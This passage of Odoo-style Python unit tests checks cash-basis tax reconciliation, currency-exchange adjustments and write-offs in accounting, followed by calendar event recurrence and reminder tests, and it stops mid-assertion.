self.assertEqual(len(cash_basis_aml_ids), 8)
# check amounts
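# The 150 payment reconciles both payable lines (100 and 50), so two cash basis moves are created, prorated by each line's share of the total: 1/3 for the 50 line (base 83.33/3 = 27.78, tax 16.67/3 = 5.56) and 2/3 for the 100 line (55.55 and 11.11).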
cash_basis_move1 = cash_basis_moves.filtered(lambda m: m.amount == 33.34)
cash_basis_move2 = cash_basis_moves.filtered(lambda m: m.amount == 66.66)
self.assertTrue(cash_basis_move1.exists())
self.assertTrue(cash_basis_move2.exists())
# For first move
move_lines = cash_basis_move1.line_ids
base_amount_tax_lines = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('credit')), 27.78)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('debit')), 27.78)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_waiting_account).credit,
5.56)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_final_account).debit,
5.56)
# For second move
move_lines = cash_basis_move2.line_ids
base_amount_tax_lines = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('credit')), 55.55)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('debit')), 55.55)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_waiting_account).credit,
11.11)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_final_account).debit,
11.11)
def test_reconciliation_cash_basis02(self):
# Simulates an invoice made up of 2 lines,
# both subject to cash basis taxes,
# with 2 payment terms
# and a partial payment not matching any payment term
company = self.env.ref('base.main_company')
company.tax_cash_basis_journal_id = self.cash_basis_journal
tax_cash_basis10percent = self.tax_cash_basis.copy({'amount': 10})
tax_waiting_account10 = self.tax_waiting_account.copy({
'name': '<NAME>',
'code': 'TWAIT1',
})
AccountMoveLine = self.env['account.move.line'].with_context(check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'invoice',
'journal_id': self.purchase_journal.id,
})
purchase_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 105,
'move_id': purchase_move.id,
})
purchase_payable_line1 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 50,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 10%',
'account_id': self.expense_account.id,
'debit': 50,
'move_id': purchase_move.id,
'tax_ids': [(4, tax_cash_basis10percent.id, False)],
})
tax_line0 = AccountMoveLine.create({
'name': 'TaxLine0',
'account_id': tax_waiting_account10.id,
'debit': 5,
'move_id': purchase_move.id,
'tax_line_id': tax_cash_basis10percent.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 20%',
'account_id': self.expense_account.id,
'debit': 83.33,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
})
tax_line1 = AccountMoveLine.create({
'name': 'TaxLine1',
'account_id': self.tax_waiting_account.id,
'debit': 16.67,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
})
purchase_move.post()
# Payment Move
payment_move0 = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_euro.id,
})
payment_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'debit': 40,
'move_id': payment_move0.id,
})
AccountMoveLine.create({
'account_id': self.account_euro.id,
'credit': 40,
'move_id': payment_move0.id,
})
payment_move0.post()
# Payment Move
payment_move1 = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_euro.id,
})
payment_payable_line1 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'debit': 115,
'move_id': payment_move1.id,
})
AccountMoveLine.create({
'account_id': self.account_euro.id,
'credit': 115,
'move_id': payment_move1.id,
})
payment_move1.post()
(purchase_move + payment_move0).mapped('line_ids').filtered(lambda l: l.account_id.internal_type == 'payable').reconcile()
(purchase_move + payment_move1).mapped('line_ids').filtered(lambda l: l.account_id.internal_type == 'payable').reconcile()
cash_basis_moves = self.env['account.move'].search([('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 3)
self.assertTrue(cash_basis_moves.exists())
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + purchase_payable_line1 + payment_payable_line0 + payment_payable_line1)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
# check reconciliation in the tax waiting account
self.assertTrue(tax_line0.full_reconcile_id.exists())
self.assertEqual(tax_line0.full_reconcile_id.reconciled_line_ids,
cash_basis_aml_ids.filtered(lambda l: l.account_id == tax_waiting_account10) + tax_line0)
self.assertTrue(tax_line1.full_reconcile_id.exists())
self.assertEqual(tax_line1.full_reconcile_id.reconciled_line_ids,
cash_basis_aml_ids.filtered(lambda l: l.account_id == self.tax_waiting_account) + tax_line1)
self.assertEqual(len(cash_basis_aml_ids), 24)
# check amounts
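# The three cash basis moves correspond to reconciled payable amounts of 105, 40 and 10 (out of the 155 total); each expected value below is that fraction of the taxed bases (83.33 at 20%, 50 at 10%) and of the related tax lines (16.67 and 5).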
expected_move_amounts = [
{'base_20': 56.45, 'tax_20': 11.29, 'base_10': 33.87, 'tax_10': 3.39},
{'base_20': 21.50, 'tax_20': 4.30, 'base_10': 12.90, 'tax_10': 1.29},
{'base_20': 5.38, 'tax_20': 1.08, 'base_10': 3.23, 'tax_10': 0.32},
]
index = 0
for cb_move in cash_basis_moves.sorted('amount', reverse=True):
expected = expected_move_amounts[index]
move_lines = cb_move.line_ids
base_amount_tax_lines20per = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account and '20%' in l.name)
base_amount_tax_lines10per = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account and '10%' in l.name)
self.assertEqual(len(base_amount_tax_lines20per), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines20per.mapped('credit')), expected['base_20'])
self.assertAlmostEqual(sum(base_amount_tax_lines20per.mapped('debit')), expected['base_20'])
self.assertEqual(len(base_amount_tax_lines10per), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines10per.mapped('credit')), expected['base_10'])
self.assertAlmostEqual(sum(base_amount_tax_lines10per.mapped('debit')), expected['base_10'])
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: l.account_id == self.tax_waiting_account).credit,
expected['tax_20']
)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: 'TaxLine1' in l.name).debit,
expected['tax_20']
)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: l.account_id == tax_waiting_account10).credit,
expected['tax_10']
)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: 'TaxLine0' in l.name).debit,
expected['tax_10']
)
index += 1
def test_reconciliation_cash_basis_fx_01(self):
"""
Company's Currency EUR
Having issued an invoice at date Nov-21-2018 as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Expenses 5,301.00 USD 106,841.65 0.00
Taxes 848.16 USD 17,094.66 0.00
Payables -6,149.16 USD 0.00 123,936.31
On Dec-20-2018 user issues an FX Journal Entry as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 0.00 USD 167.86 0.00
FX Gains 0.00 USD 0.00 167.86
On Same day user records a payment for:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 6,149.16 USD 123,768.45 0.00
Bank -6,149.16 USD 0.00 123,768.45
And then reconciles the Payables Items which shall render only one Tax
Cash Basis Journal Entry because of the actual payment, i.e.
amount_currency != 0:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Tax Base Acc. 0.00 USD 106,841.65 0.00
Tax Base Acc. 0.00 USD 0.00 106,841.65
Creditable Taxes 848.16 USD 17,094.66 0.00
Taxes -848.16 USD 0.00 17,094.66
"""
company = self.env.ref('base.main_company')
company.country_id = self.ref('base.us')
company.tax_cash_basis_journal_id = self.cash_basis_journal
aml_obj = self.env['account.move.line'].with_context(
check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'purchase',
'journal_id': self.purchase_journal.id,
})
aml_obj.create({
'name': 'expenseTaxed',
'account_id': self.expense_account.id,
'debit': 106841.65,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
'currency_id': self.currency_usd_id,
'amount_currency': 5301.00,
})
aml_obj.create({
'name': 'TaxLine',
'account_id': self.tax_waiting_account.id,
'debit': 17094.66,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
'currency_id': self.currency_usd_id,
'amount_currency': 848.16,
})
purchase_payable_line0 = aml_obj.create({
'name': 'Payable',
'account_id': self.account_rsa.id,
'credit': 123936.31,
'move_id': purchase_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
purchase_move.post()
# FX 01 Move
fx_move_01 = self.env['account.move'].create({
'name': 'FX 01',
'journal_id': self.fx_journal.id,
})
fx_01_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 167.86,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
aml_obj.create({
'account_id': self.diff_income_account.id,
'credit': 167.86,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
fx_move_01.post()
# Payment Move
payment_move = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_usd.id,
})
payment_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': 6149.16,
})
aml_obj.create({
'account_id': self.account_usd.id,
'credit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
payment_move.post()
to_reconcile = (
(purchase_move + payment_move + fx_move_01).mapped('line_ids')
.filtered(lambda l: l.account_id.internal_type == 'payable'))
to_reconcile.reconcile()
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(
purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + fx_01_payable_line + payment_payable_line)
# check cash basis
cash_basis_moves = self.env['account.move'].search(
[('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 1)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
self.assertEqual(len(cash_basis_aml_ids), 4)
# check amounts
cash_basis_move1 = cash_basis_moves.filtered(
lambda m: m.amount == 123936.31)
self.assertTrue(cash_basis_move1.exists())
# For first move
move_lines = cash_basis_move1.line_ids
base_amount_tax_lines = move_lines.filtered(
lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('credit')), 106841.65)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('debit')), 106841.65)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_waiting_account)
.credit, 17094.66)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_final_account)
.debit, 17094.66)
def test_reconciliation_cash_basis_fx_02(self):
"""
Company's Currency EUR
Having issued an invoice at date Nov-21-2018 as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Expenses 5,301.00 USD 106,841.65 0.00
Taxes 848.16 USD 17,094.66 0.00
Payables -6,149.16 USD 0.00 123,936.31
On Nov-30-2018 user issues an FX Journal Entry as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
FX Losses 0.00 USD 1,572.96 0.00
Payables 0.00 USD 0.00 1,572.96
On Dec-20-2018 user issues an FX Journal Entry as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 0.00 USD 1,740.82 0.00
FX Gains 0.00 USD 0.00 1,740.82
On Same day user records a payment for:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 6,149.16 USD 123,768.45 0.00
Bank -6,149.16 USD 0.00 123,768.45
And then reconciles the Payables Items which shall render only one Tax
Cash Basis Journal Entry because of the actual payment, i.e.
amount_currency != 0:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Tax Base Acc. 0.00 USD 106,841.65 0.00
Tax Base Acc. 0.00 USD 0.00 106,841.65
Creditable Taxes 848.16 USD 17,094.66 0.00
Taxes -848.16 USD 0.00 17,094.66
"""
company = self.env.ref('base.main_company')
company.country_id = self.ref('base.us')
company.tax_cash_basis_journal_id = self.cash_basis_journal
aml_obj = self.env['account.move.line'].with_context(
check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'purchase',
'journal_id': self.purchase_journal.id,
})
aml_obj.create({
'name': 'expenseTaxed',
'account_id': self.expense_account.id,
'debit': 106841.65,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
'currency_id': self.currency_usd_id,
'amount_currency': 5301.00,
})
aml_obj.create({
'name': 'TaxLine',
'account_id': self.tax_waiting_account.id,
'debit': 17094.66,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
'currency_id': self.currency_usd_id,
'amount_currency': 848.16,
})
purchase_payable_line0 = aml_obj.create({
'name': 'Payable',
'account_id': self.account_rsa.id,
'credit': 123936.31,
'move_id': purchase_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
purchase_move.post()
# FX 01 Move
fx_move_01 = self.env['account.move'].create({
'name': 'FX 01',
'journal_id': self.fx_journal.id,
})
fx_01_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'credit': 1572.96,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
aml_obj.create({
'account_id': self.diff_expense_account.id,
'debit': 1572.96,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
fx_move_01.post()
# FX 02 Move
fx_move_02 = self.env['account.move'].create({
'name': 'FX 02',
'journal_id': self.fx_journal.id,
})
fx_02_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 1740.82,
'move_id': fx_move_02.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
aml_obj.create({
'account_id': self.diff_income_account.id,
'credit': 1740.82,
'move_id': fx_move_02.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
fx_move_02.post()
# Payment Move
payment_move = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_usd.id,
})
payment_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': 6149.16,
})
aml_obj.create({
'account_id': self.account_usd.id,
'credit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
payment_move.post()
to_reconcile = (
(purchase_move + payment_move + fx_move_01 + fx_move_02)
.mapped('line_ids')
.filtered(lambda l: l.account_id.internal_type == 'payable'))
to_reconcile.reconcile()
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(
purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + fx_01_payable_line + fx_02_payable_line +
payment_payable_line)
# check cash basis
cash_basis_moves = self.env['account.move'].search(
[('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 1)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
self.assertEqual(len(cash_basis_aml_ids), 4)
# check amounts
cash_basis_move1 = cash_basis_moves.filtered(
lambda m: m.amount == 123936.31)
self.assertTrue(cash_basis_move1.exists())
# For first move
move_lines = cash_basis_move1.line_ids
base_amount_tax_lines = move_lines.filtered(
lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('credit')), 106841.65)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('debit')), 106841.65)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_waiting_account)
.credit, 17094.66)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_final_account)
.debit, 17094.66)
def test_reconciliation_cash_basis_revert(self):
company = self.env.ref('base.main_company')
company.tax_cash_basis_journal_id = self.cash_basis_journal
tax_cash_basis10percent = self.tax_cash_basis.copy({'amount': 10})
self.tax_waiting_account.reconcile = True
tax_waiting_account10 = self.tax_waiting_account.copy({
'name': '<NAME>',
'code': 'TWAIT1',
})
AccountMoveLine = self.env['account.move.line'].with_context(check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'invoice',
'journal_id': self.purchase_journal.id,
})
purchase_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 175,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 10%',
'account_id': self.expense_account.id,
'debit': 50,
'move_id': purchase_move.id,
'tax_ids': [(4, tax_cash_basis10percent.id, False)],
})
tax_line0 = AccountMoveLine.create({
'name': 'TaxLine0',
'account_id': tax_waiting_account10.id,
'debit': 5,
'move_id': purchase_move.id,
'tax_line_id': tax_cash_basis10percent.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 20%',
'account_id': self.expense_account.id,
'debit': 100,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
})
tax_line1 = AccountMoveLine.create({
'name': 'TaxLine1',
'account_id': self.tax_waiting_account.id,
'debit': 20,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
})
purchase_move.post()
reverted = self.env['account.move'].browse(purchase_move.reverse_moves())
self.assertTrue(reverted.exists())
for inv_line in [purchase_payable_line0, tax_line0, tax_line1]:
self.assertTrue(inv_line.full_reconcile_id.exists())
reverted_expected = reverted.line_ids.filtered(lambda l: l.account_id == inv_line.account_id)
self.assertEqual(len(reverted_expected), 1)
self.assertEqual(reverted_expected.full_reconcile_id, inv_line.full_reconcile_id)
def test_reconciliation_cash_basis_foreign_currency_low_values(self):
journal = self.env['account.journal'].create({
'name': 'Bank', 'type': 'bank', 'code': 'THE',
'currency_id': self.currency_usd_id,
})
usd = self.env['res.currency'].browse(self.currency_usd_id)
usd.rate_ids.unlink()
self.env['res.currency.rate'].create({
'name': time.strftime('%Y-01-01'),
'rate': 1/17.0,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id,
})
invoice = self.create_invoice(
type='out_invoice', invoice_amount=50,
currency_id=self.currency_usd_id)
invoice.journal_id.update_posted = True
invoice.action_cancel()
invoice.state = 'draft'
invoice.invoice_line_ids.write({
'invoice_line_tax_ids': [(6, 0, [self.tax_cash_basis.id])]})
invoice.compute_taxes()
invoice.action_invoice_open()
self.assertTrue(invoice.currency_id != self.env.user.company_id.currency_id)
# First Payment
payment0 = self.make_payment(invoice, journal, invoice.amount_total - 0.01)
self.assertEqual(invoice.residual, 0.01)
tax_waiting_line = invoice.move_id.line_ids.filtered(lambda l: l.account_id == self.tax_waiting_account)
self.assertFalse(tax_waiting_line.reconciled)
move_caba0 = tax_waiting_line.matched_debit_ids.debit_move_id.move_id
self.assertTrue(move_caba0.exists())
self.assertEqual(move_caba0.journal_id, self.env.user.company_id.tax_cash_basis_journal_id)
pay_receivable_line0 = payment0.move_line_ids.filtered(lambda l: l.account_id == self.account_rcv)
self.assertTrue(pay_receivable_line0.reconciled)
self.assertEqual(pay_receivable_line0.matched_debit_ids, move_caba0.tax_cash_basis_rec_id)
# Second Payment
payment1 = self.make_payment(invoice, journal, 0.01)
self.assertEqual(invoice.residual, 0)
self.assertEqual(invoice.state, 'paid')
self.assertTrue(tax_waiting_line.reconciled)
move_caba1 = tax_waiting_line.matched_debit_ids.mapped('debit_move_id').mapped('move_id').filtered(lambda m: m != move_caba0)
self.assertEqual(len(move_caba1.exists()), 1)
self.assertEqual(move_caba1.journal_id, self.env.user.company_id.tax_cash_basis_journal_id)
pay_receivable_line1 = payment1.move_line_ids.filtered(lambda l: l.account_id == self.account_rcv)
self.assertTrue(pay_receivable_line1.reconciled)
self.assertEqual(pay_receivable_line1.matched_debit_ids, move_caba1.tax_cash_basis_rec_id)
def test_reconciliation_with_currency(self):
# Reconciliation on an account whose secondary currency is
# the same as the company currency
account_rcv = self.account_rcv
account_rcv.currency_id = self.currency_euro_id
aml_obj = self.env['account.move.line'].with_context(
check_move_validity=False)
general_move1 = self.env['account.move'].create({
'name': 'general1',
'journal_id': self.general_journal.id,
})
aml_obj.create({
'name': 'debit1',
'account_id': account_rcv.id,
'debit': 11,
'move_id': general_move1.id,
})
aml_obj.create({
'name': 'credit1',
'account_id': self.account_rsa.id,
'credit': 11,
'move_id': general_move1.id,
})
general_move1.post()
general_move2 = self.env['account.move'].create({
'name': 'general2',
'journal_id': self.general_journal.id,
})
aml_obj.create({
'name': 'credit2',
'account_id': account_rcv.id,
'credit': 10,
'move_id': general_move2.id,
})
aml_obj.create({
'name': 'debit2',
'account_id': self.account_rsa.id,
'debit': 10,
'move_id': general_move2.id,
})
general_move2.post()
general_move3 = self.env['account.move'].create({
'name': 'general3',
'journal_id': self.general_journal.id,
})
aml_obj.create({
'name': 'credit3',
'account_id': account_rcv.id,
'credit': 1,
'move_id': general_move3.id,
})
aml_obj.create({
'name': 'debit3',
'account_id': self.account_rsa.id,
'debit': 1,
'move_id': general_move3.id,
})
general_move3.post()
to_reconcile = ((general_move1 + general_move2 + general_move3)
.mapped('line_ids')
.filtered(lambda l: l.account_id.id == account_rcv.id))
to_reconcile.reconcile()
for aml in to_reconcile:
self.assertEqual(aml.amount_residual, 0.0)
def test_inv_refund_foreign_payment_writeoff_domestic2(self):
company = self.env.ref('base.main_company')
self.env['res.currency.rate'].search([]).unlink()
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_euro_id,
'company_id': company.id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.110600, # Don't change this !
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv1 = self.create_invoice(invoice_amount=800, currency_id=self.currency_usd_id)
inv2 = self.create_invoice(type="out_refund", invoice_amount=400, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_method_id': self.inbound_payment_method.id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': inv1.partner_id.id,
'amount': 200.00,
'journal_id': self.bank_journal_euro.id,
'company_id': company.id,
})
payment.post()
inv1_receivable = inv1.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
inv2_receivable = inv2.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
pay_receivable = payment.move_line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
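# Sanity of the balance write-off: 800 USD / 1.1106 = 720.33 EUR and 400 USD / 1.1106 = 360.17 EUR, leaving a net receivable of 360.16 EUR; the 200 EUR payment plus the 160.16 EUR write-off below clears it.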
move_balance = self.env['account.move'].create({
'partner_id': inv1.partner_id.id,
'date': time.strftime('%Y') + '-07-01',
'journal_id': self.bank_journal_euro.id,
'line_ids': [
(0, False, {'credit': 160.16, 'account_id': inv1_receivable.account_id.id, 'name': 'Balance WriteOff'}),
(0, False, {'debit': 160.16, 'account_id': self.diff_expense_account.id, 'name': 'Balance WriteOff'}),
]
})
move_balance.post()
move_balance_receiv = move_balance.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
(inv1_receivable + inv2_receivable + pay_receivable + move_balance_receiv).reconcile()
self.assertTrue(inv1_receivable.full_reconcile_id.exists())
self.assertEquals(inv1_receivable.full_reconcile_id, inv2_receivable.full_reconcile_id)
self.assertEquals(inv1_receivable.full_reconcile_id, pay_receivable.full_reconcile_id)
self.assertEquals(inv1_receivable.full_reconcile_id, move_balance_receiv.full_reconcile_id)
self.assertTrue(inv1.reconciled)
self.assertTrue(inv2.reconciled)
self.assertEquals(inv1.state, 'paid')
self.assertEquals(inv2.state, 'paid')
```
#### File: calendar/tests/test_calendar.py
```python
import datetime
from datetime import datetime, timedelta, time
from odoo import fields
from odoo.tests.common import TransactionCase
import pytz
import re
class TestCalendar(TransactionCase):
def setUp(self):
super(TestCalendar, self).setUp()
self.CalendarEvent = self.env['calendar.event']
# In order to test the calendar, I will first create one simple event with real data
self.event_tech_presentation = self.CalendarEvent.create({
'privacy': 'private',
'start': '2011-04-30 16:00:00',
'stop': '2011-04-30 18:30:00',
'description': 'The Technical Presentation will cover following topics:\n* Creating Odoo class\n* Views\n* Wizards\n* Workflows',
'duration': 2.5,
'location': 'Odoo S.A.',
'name': 'Technical Presentation'
})
def test_calender_simple_event(self):
m = self.CalendarEvent.create({
'name': "Test compute",
'start': '2017-07-12 14:30:00',
'allday': False,
'stop': '2017-07-12 15:00:00',
})
self.assertEqual(
(str(m.start_datetime), str(m.stop_datetime)),
(u'2017-07-12 14:30:00', u'2017-07-12 15:00:00'),
"Sanity check"
)
def test_calender_event(self):
# Now I will set a recurrence for this event to occur on Monday and Friday of every week
data = {
'fr': 1,
'mo': 1,
'interval': 1,
'rrule_type': 'weekly',
'end_type': 'end_date',
'final_date': '2011-05-31 00:00:00',
'recurrency': True
}
self.event_tech_presentation.write(data)
# In order to check that recurrent events are displayed successfully in the calendar view, I will open the calendar view of events
self.CalendarEvent.fields_view_get(False, 'calendar')
# In order to check that recurrent events are displayed successfully in the calendar view, I will search for one of the recurrent events and count the number of events
rec_events = self.CalendarEvent.with_context({'virtual_id': True}).search([
('start', '>=', '2011-04-30 16:00:00'), ('start', '<=', '2011-05-31 00:00:00')
])
self.assertEqual(len(rec_events), 9, 'Wrong number of events found')
# Now I move a virtual event, to see that a real event is properly created and depends on the native recurrence
before = self.CalendarEvent.with_context({'virtual_id': False}).search([
('start', '>=', '2011-04-30 16:00:00'), ('start', '<=', '2011-05-31 00:00:00')
])
# We start by detaching the event
newevent = rec_events[1].detach_recurring_event()
newevent.with_context({'virtual_id': True}).write({'name': '<NAME>', 'recurrency': True})
after = self.CalendarEvent.with_context({'virtual_id': False}).search([
('start', '>=', '2011-04-30 16:00:00'), ('start', '<=', '2011-05-31 00:00:00')
])
self.assertEqual(len(after), len(before) + 1, 'Wrong number of events found after moving a virtual event')
new_event = after - before
self.assertEqual(new_event[0].recurrent_id, before.id, 'Recurrent_id not correctly passed to the new event')
# Now I will test an all-day event
allday_event = self.CalendarEvent.create({
'allday': 1,
'privacy': 'confidential',
'start': '2011-04-30 00:00:00',
'stop': '2011-04-30 00:00:00',
'description': 'All day technical test',
'location': 'School',
'name': 'All day test event'
})
# In order to check reminders, I will first create a reminder
res_alarm_day_before_event_starts = self.env['calendar.alarm'].create({
'name': '1 Day before event starts',
'duration': 1,
'interval': 'days',
'type': 'notification'
})
# Now I will assign this reminder to the all-day event
allday_event.write({'alarm_ids': [(6, 0, [res_alarm_day_before_event_starts.id])]})
# I create a recurring rule for my event
calendar_event_sprint_review = self.CalendarEvent.create({
'name': 'Begin of month meeting',
'start': datetime.combine(fields.Date.today(), time(12, 0)),
'stop': datetime.combine(fields.Date.today(), time(18, 0)),
'recurrency': True,
'rrule': 'FREQ=MONTHLY;INTERVAL=1;COUNT=12;BYDAY=1MO'
})
# I check that the attributes are set correctly
self.assertEqual(calendar_event_sprint_review.rrule_type, 'monthly', 'rrule_type should be monthly')
self.assertEqual(calendar_event_sprint_review.count, 12, 'count should be 12')
self.assertEqual(calendar_event_sprint_review.month_by, 'day', 'month_by should be day')
self.assertEqual(calendar_event_sprint_review.byday, '1', 'byday should be 1')
self.assertEqual(calendar_event_sprint_review.week_list, 'MO', 'week_list should be MO')
def test_validation_error(self):
"""
Ideally this should build the base event in such a way that calling
write() triggers detach_recurring_event, but I've no idea how that
actually works so just calling it directly for now
"""
m = self.CalendarEvent.create({
'name': "wheee",
'start': '2017-07-12 14:30:00',
'allday': False,
'rrule': u'FREQ=WEEKLY;BYDAY=WE;INTERVAL=1;COUNT=100',
'duration': 0.5,
'stop': '2017-07-12 15:00:00',
})
self.assertEqual(
(str(m.start_datetime), str(m.stop_datetime)),
(u'2017-07-12 14:30:00', u'2017-07-12 15:00:00'),
"Sanity check"
)
values = {
'allday': False,
'name': u'wheee',
'attendee_ids': [
(0, 0, {'state': u'needsAction', 'partner_id': 8, 'email': u'<EMAIL>'}),
(0, 0, {'state': u'needsAction', 'partner_id': 10, 'email': u'<EMAIL>'}),
],
'recurrency': True,
'privacy': u'public',
'stop': '2017-07-10 16:00:00',
'alarm_ids': [(6, 0, [])],
'start': '2017-07-10 15:30:00',
'location': u"XXX",
'duration': 0.5,
'partner_ids': [(4, 10), (4, 8)],
'description': u"A thing"
}
records = m.detach_recurring_event(values)
self.assertEqual(
(str(m.start_datetime), str(m.stop_datetime)),
('2017-07-12 14:30:00', u'2017-07-12 15:00:00'),
)
self.assertEquals(
(str(records.start_datetime), str(records.stop_datetime)),
